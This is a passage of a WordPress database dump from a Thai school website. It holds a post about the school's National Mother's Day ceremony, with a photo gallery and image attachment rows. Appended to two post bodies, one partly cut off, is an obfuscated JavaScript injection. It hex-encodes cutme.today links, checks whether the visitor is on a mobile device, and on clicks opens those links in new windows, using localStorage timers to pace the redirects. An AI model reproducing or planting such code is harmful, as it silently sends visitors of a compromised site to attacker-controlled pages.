)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์ วันแม่แห่งชาติ','','inherit','closed','closed','','789-revision-v1','','','2024-08-09 21:55:44','2024-08-09 14:55:44','',789,'http://pakhaeng.ssk.in.th/?p=791',0,'revision','',0),
(792,1,'2024-08-09 21:58:26','2024-08-09 14:58:26','<!-- wp:paragraph -->\n<p><strong>เมื่อวันที่ 8 สิงหาคม 2567 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ จัดกิจกรรมวันแม่แห่งชาติ เนื่องในวันเฉลิมพระชนมพรรษา สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง เพื่อแสดงความจงรักภักดีแด่องค์สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง และเพื่อให้นักเรียนได้แสดงความเคารพ ความกตัญญูกตเวทีต่อผู้มีพระคุณ โดยกิจกรรมประกอบด้วย คณะครู บุคลากร นักเรียนและผู้ปกครอง โดยพิธีเริ่มจากประธานเปิดกรวยธูปเทียนแพร ถวายพุ่มเงิน พุ่มทอง และเปิดกรวยถวายราชสักการะ ลงนามถวายพระพร ประธานกล่าวถวายราชสดุดีเฉลิมพระเกียรติถวายพระพรชัยมงคล สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง ทุกคนร่วมร้องเพลงสดุดีพระแม่ไทยและ ร้องเพลงสรรเสริญพระบารมี จากนั้นนักเรียนทุกคนแสดงความรักและกตัญญูต่อแม่ ณ ใต้ถุนอาคาร โรงเรียนบ้านหนองปลาเข็ง กอไหล่</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":795,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/IMG_8171-1024x578.jpg\" alt=\"\" class=\"wp-image-795\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":793,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/IMG_8156-1024x768.jpg\" alt=\"\" class=\"wp-image-793\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":798,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/IMG_8160-1024x768.jpg\" alt=\"\" class=\"wp-image-798\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":794,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/IMG_8189-1024x578.jpg\" alt=\"\" class=\"wp-image-794\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":797,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1725_0-1024x683.jpg\" alt=\"\" class=\"wp-image-797\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":796,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1768_0-1024x683.jpg\" alt=\"\" class=\"wp-image-796\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":799,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1825_0-1024x683.jpg\" alt=\"\" class=\"wp-image-799\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":800,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1714_0-1024x683.jpg\" alt=\"\" class=\"wp-image-800\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":801,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1755_0-1024x683.jpg\" alt=\"\" class=\"wp-image-801\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":802,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1759_0-1024x683.jpg\" alt=\"\" class=\"wp-image-802\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":803,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1724_0-1024x683.jpg\" alt=\"\" class=\"wp-image-803\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":804,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1772_0-1024x683.jpg\" alt=\"\" class=\"wp-image-804\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":806,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1840_0-1024x683.jpg\" alt=\"\" class=\"wp-image-806\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":805,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1890_0-1024x683.jpg\" alt=\"\" class=\"wp-image-805\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','12 สิหาคม 2567 กิจกรรมวันแม่แห่งชาติ เนื่องในวันเฉลิมพระชนมพรรษา สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ พระบรมราชชนนีพันปีหลวง','','publish','closed','closed','','12-%e0%b8%aa%e0%b8%b4%e0%b8%ab%e0%b8%b2%e0%b8%84%e0%b8%a1-2567-%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b9%81%e0%b8%a1%e0%b9%88%e0%b9%81%e0%b8%ab','','','2024-08-09 21:58:26','2024-08-09 14:58:26','',0,'http://pakhaeng.ssk.in.th/?p=792',0,'post','',0),
(793,1,'2024-08-09 21:57:14','2024-08-09 14:57:14','','IMG_8156','','inherit','','closed','','img_8156','','','2024-08-09 21:57:14','2024-08-09 14:57:14','',792,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/IMG_8156.jpg',0,'attachment','image/jpeg',0),
(794,1,'2024-08-09 21:57:14','2024-08-09 14:57:14','','IMG_8189','','inherit','','closed','','img_8189','','','2024-08-09 21:57:14','2024-08-09 14:57:14','',792,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/IMG_8189.jpg',0,'attachment','image/jpeg',0),
(795,1,'2024-08-09 21:57:14','2024-08-09 14:57:14','','IMG_8171','','inherit','','closed','','img_8171','','','2024-08-09 21:57:14','2024-08-09 14:57:14','',792,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/IMG_8171.jpg',0,'attachment','image/jpeg',0),
(796,1,'2024-08-09 21:57:15','2024-08-09 14:57:15','','DSC_1768_0','','inherit','','closed','','dsc_1768_0','','','2024-08-09 21:57:15','2024-08-09 14:57:15','',792,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1768_0.jpg',0,'attachment','image/jpeg',0),
(797,1,'2024-08-09 21:57:15','2024-08-09 14:57:15','','DSC_1725_0','','inherit','','closed','','dsc_1725_0','','','2024-08-09 21:57:15','2024-08-09 14:57:15','',792,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1725_0.jpg',0,'attachment','image/jpeg',0),
(798,1,'2024-08-09 21:57:16','2024-08-09 14:57:16','','IMG_8160','','inherit','','closed','','img_8160','','','2024-08-09 21:57:16','2024-08-09 14:57:16','',792,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/IMG_8160.jpg',0,'attachment','image/jpeg',0),
(799,1,'2024-08-09 21:57:25','2024-08-09 14:57:25','','DSC_1825_0','','inherit','','closed','','dsc_1825_0','','','2024-08-09 21:57:25','2024-08-09 14:57:25','',792,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1825_0.jpg',0,'attachment','image/jpeg',0),
(800,1,'2024-08-09 21:57:25','2024-08-09 14:57:25','','DSC_1714_0','','inherit','','closed','','dsc_1714_0','','','2024-08-09 21:57:25','2024-08-09 14:57:25','',792,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1714_0.jpg',0,'attachment','image/jpeg',0),
(801,1,'2024-08-09 21:57:30','2024-08-09 14:57:30','','DSC_1755_0','','inherit','','closed','','dsc_1755_0','','','2024-08-09 21:57:30','2024-08-09 14:57:30','',792,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1755_0.jpg',0,'attachment','image/jpeg',0),
(802,1,'2024-08-09 21:57:33','2024-08-09 14:57:33','','DSC_1759_0','','inherit','','closed','','dsc_1759_0','','','2024-08-09 21:57:33','2024-08-09 14:57:33','',792,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1759_0.jpg',0,'attachment','image/jpeg',0),
(803,1,'2024-08-09 21:57:37','2024-08-09 14:57:37','','DSC_1724_0','','inherit','','closed','','dsc_1724_0','','','2024-08-09 21:57:37','2024-08-09 14:57:37','',792,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1724_0.jpg',0,'attachment','image/jpeg',0),
(804,1,'2024-08-09 21:57:38','2024-08-09 14:57:38','','DSC_1772_0','','inherit','','closed','','dsc_1772_0','','','2024-08-09 21:57:38','2024-08-09 14:57:38','',792,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1772_0.jpg',0,'attachment','image/jpeg',0),
(805,1,'2024-08-09 21:57:48','2024-08-09 14:57:48','','DSC_1890_0','','inherit','','closed','','dsc_1890_0','','','2024-08-09 21:57:48','2024-08-09 14:57:48','',792,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1890_0.jpg',0,'attachment','image/jpeg',0),
(806,1,'2024-08-09 21:57:48','2024-08-09 14:57:48','','DSC_1840_0','','inherit','','closed','','dsc_1840_0','','','2024-08-09 21:57:48','2024-08-09 14:57:48','',792,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/DSC_1840_0.jpg',0,'attachment','image/jpeg',0),
